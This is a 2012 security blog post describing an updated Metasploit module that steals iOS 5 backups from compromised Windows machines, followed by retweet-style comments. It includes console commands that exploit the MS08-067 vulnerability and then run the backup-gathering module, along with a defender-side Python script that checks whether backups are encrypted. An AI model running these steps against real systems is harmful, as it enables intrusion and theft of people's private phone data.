Metasploit Module to Steal iOS 5 Backups

September 14, 2012

We received this great article from @satishb3 over at SecurityLearn.net. It’s a bit more technical than we usually go but … it’s about Metasploit and iPhones. How could we pass that up? Plus he’s included a video that shows his module in action. Enjoy!

If you have an article you’d like published on NovaInfosec.com, just send it over to us via our Submit Article form. And without further ado we’ll turn it over to @satishb3.

Metasploit contains a post-exploitation module that pulls Apple iOS backup files from a victim’s computer. However, the existing module was written for iOS 4 backups and does not support the newer iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups.

Running the existing apple_ios_backup post-exploitation module in Metasploit (v4.4.0) against an iOS 5 backup ends with the exception below.

meterpreter> run post/multi/gather/apple_ios_backup

[*] Checking for backups in C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
[*] Found C:\Documents and Settings\Administrator\Application Data
    \Apple Computer\MobileSync\Backup\
    b716de79051ef093a98fc3ff1c46ca5e36faabc3
[*] Checking for backups in C:\Documents and Settings\SATISH-E6338BC0
    \Application Data\Apple Computer\MobileSync\Backup
[*] Pulling data from C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdb from C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdx from C:\Documents and Settings
    \Administrator\Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_open:
    Operation failed: The system cannot find the file specified.
[-] Call stack:
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channel.rb:116:in
      `create'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channels/pools/
      file.rb:35:in `open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi
      /fs/file.rb:325:in `_open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi
      /fs/file.rb:276:in `initialize'

The details below outline the usage of the updated Metasploit Apple iOS Backup File Extraction module. I used Metasploit 4.4 on BackTrack 5 R1.

The Apple iOS Backup File Extraction module is a post-exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether it’s social engineering, a guessed password, or an unpatched vulnerability.” So in order to use the iOS backup module, we first have to compromise the system through some other vector.

Usage Steps:

  1. Download apple_ios_backup.rb and place it in the /opt/metasploit/msf3/modules/post/multi/gather/ directory.
  2. Download apple_backup_manifestdb.rb and place it in the /opt/metasploit/msf3/lib/rex/parser/ directory.
  3. Open Metasploit using msfconsole.
  4. Use meterpreter as the payload and exploit a vulnerability in the target system.

In my case, the victim machine runs Windows XP (192.168.209.128) and is vulnerable to ms08_067_netapi. The following steps exploit the vulnerability and open a meterpreter shell.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.209.128
RHOST => 192.168.209.128
msf  exploit(ms08_067_netapi) > exploit

  5. Once the meterpreter session is established, the iOS backup on the victim machine can be dumped using the following command: run post/multi/gather/apple_ios_backup

The above script searches for iOS backup files in the default iTunes backup locations. If it does not find any backups on the target system, it displays the message ‘No users found with an iTunes backup directory’. If it finds a backup, it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.

[Image: iPhone backup path in Windows and Mac OS X]

Though the Apple iOS backup extraction module dumps every file from the victim’s backup, how much data the attacker actually obtains depends on the type of iOS backup. If the victim machine holds an encrypted backup, stealing the backup files yields almost nothing, because every file in an encrypted backup is encrypted with the user-supplied iTunes password. If the victim machine holds a normal (unencrypted) backup, we can read the sensitive data stored in every file except the Keychain database; in normal backups the keychain is encrypted with a hardware key embedded in the iPhone.
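As an added defender-side example (not part of the original post or of the Metasploit module), the Python script below walks the default iTunes backup locations discussed above and reports, from the IsEncrypted flag in each backup’s Manifest.plist, which backups would be readable to anyone who copied the directory. The macOS path is the stock iTunes location and is an assumption here, and make_sample_backups() builds a constructed backup tree so the check can be tried offline.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# Default iTunes backup roots: the Windows path is the one in the post's output (%APPDATA% is
# "...\Application Data" on XP); the macOS path is the stock iTunes location (assumed here).
DEFAULT_BACKUP_ROOTS = [
    Path(os.environ.get("APPDATA", "")) / "Apple Computer" / "MobileSync" / "Backup",
    Path.home() / "Library" / "Application Support" / "MobileSync" / "Backup",
]

def backup_status(backup_dir):
    """Return (device_name, ios_version, is_encrypted) from Manifest.plist, or None if absent."""
    manifest = Path(backup_dir) / "Manifest.plist"
    if not manifest.is_file():
        return None
    with manifest.open("rb") as fp:
        data = plistlib.load(fp)  # plistlib detects binary vs XML plists itself
    lockdown = data.get("Lockdown", {})
    return (lockdown.get("DeviceName", "?"), lockdown.get("ProductVersion", "?"),
            bool(data.get("IsEncrypted", False)))

def audit_backup_root(root):
    """Map each backup directory (named by device UDID) under root to its status."""
    root, results = Path(root), {}
    if not root.is_dir():
        return results
    for entry in sorted(root.iterdir()):
        status = backup_status(entry) if entry.is_dir() else None
        if status is not None:
            results[entry.name] = status
    return results

def unencrypted_backups(root):
    """UDIDs of backups whose files are readable by anyone who copies the directory."""
    return [udid for udid, (_, _, enc) in audit_backup_root(root).items() if not enc]

def make_sample_backups():
    """Build a CONSTRUCTED two-backup tree (one plain, one encrypted) in a temp dir."""
    root = Path(tempfile.mkdtemp())
    samples = {"b716de79051ef093a98fc3ff1c46ca5e36faabc3": False,  # UDID from the post's output
               "ffffffffffffffffffffffffffffffffffffffff": True}   # made-up UDID
    for udid, enc in samples.items():
        (root / udid).mkdir()
        with (root / udid / "Manifest.plist").open("wb") as fp:
            plistlib.dump({"IsEncrypted": enc, "Lockdown": {"DeviceName": "sample iPhone",
                           "ProductVersion": "5.1.1"}}, fp, fmt=plistlib.FMT_BINARY)
    return root
```

On a machine you administer, call audit_backup_root() on each entry of DEFAULT_BACKUP_ROOTS; any UDID returned by unencrypted_backups() is a backup that should be switched to an encrypted one in iTunes.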

The post module can steal iOS backups from Windows and Mac OS X machines. I have tested it on Windows. It should definitely work on OS X as well.

iOS backup is a treasure for pentesters. Happy hacking :)

Cross-posted from SecurityLearn.net

#####

And don’t forget … if you are interested in posting an article on NovaInfosec.com, please head on over to our Submit Article page for all the details. Today’s post image is from the folks over at Hacker5 5ecrets.


16 Responses to Metasploit Module to Steal iOS 5 Backups

  1. (@novainfosec) (@novainfosec) on September 14, 2012 at 6:57 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU //New post from @satishb3..

  2. (@vaaccess) (@vaaccess) on September 14, 2012 at 9:11 pm

    #Metasploit Module to Steal #iOS 5 Backups http://t.co/0dLr3Rpb #infosec

  3. Santosh M Satam (@satamsantosh) on September 14, 2012 at 10:02 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/mpjyQO9c

  4. (@novainfosec) (@novainfosec) on September 14, 2012 at 11:04 pm

    #NOVABLOGGER: Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU http://t.co/IntXkFbO

  6. Billy (@wlgraham_atl) on September 15, 2012 at 6:05 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/8bzorbh0 via @zite

  7. Yan Kravchenko (@yanfosec) on September 15, 2012 at 8:23 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/vTcuDsvD this reminds me, you can’t remote wipe an offline backup…

  8. Omar Santos (@santosomar) on September 15, 2012 at 9:16 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/Av4chraj

  9. (@CiphersSon) (@CiphersSon) on September 15, 2012 at 10:53 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/XptBVY3c

  10. Kenya ? (@koa) on September 15, 2012 at 12:10 pm

    O_O RT @novainfosec: Metasploit Module to Steal iOS 5 Backups http://t.co/tatNpRlT //New post from @satishb3..

  11. (@grecs) (@grecs) on September 15, 2012 at 1:18 pm

    BLOGGED: Metasploit Module to Steal iOS 5 Backups http://t.co/HxquVl1v //In case U missed.

  12. (@novainfosec) (@novainfosec) on September 15, 2012 at 1:18 pm

    BLOGGED: Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU //In case U missed.

  13. (@DFMag) (@DFMag) on September 16, 2012 at 6:28 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/v1moWcSG Technical but interesting.

  14. Ichiro MATSUURA (@imatsuura) on September 16, 2012 at 7:22 pm

    Apple iOS backup files from a victim’s computer by using Metasploit http://t.co/NUHuM7TJ

  15. Karsten Weiss (@knweiss) on September 21, 2012 at 3:44 pm

    The Metasploit module for stealing iOS backups was a good reason for me to finally encrypt all my iOS backups: http://t.co/hmSLSucd

  16. @hackxEC on March 8, 2013 at 3:01 pm

    #Metasploit module for obtaining iOS5 #Backups … https://t.co/0EJTjQfP8o
